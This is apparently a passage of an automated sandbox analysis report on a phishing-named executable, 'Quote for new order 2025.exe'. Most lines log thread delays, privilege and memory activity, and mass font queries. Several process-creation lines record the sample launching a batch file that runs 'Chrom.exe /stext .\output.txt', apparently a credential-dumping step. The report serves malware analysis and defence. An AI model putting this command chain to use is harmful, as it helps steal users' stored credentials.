                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 100000Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: bhv1FE2.tmp.8.dr, bhv428D.tmp.14.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                          Source: Quote for new order 2025.exe, 00000000.00000002.3543376983.00000000080DE000.00000004.00000020.00020000.00000000.sdmp, Quote for new order 2025.exe, 00000005.00000002.3541044166.00000000070F5000.00000004.00000020.00020000.00000000.sdmp, Quote for new order 2025.exe, 0000000B.00000002.3539781013.0000000007085000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: bhv428D.tmp.14.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040BAE3
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,4_2_004053E1
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txtJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\windown.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\Chrom.exe .\Chrom.exe /stext .\output.txt
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Users\user\Desktop\Quote for new order 2025.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
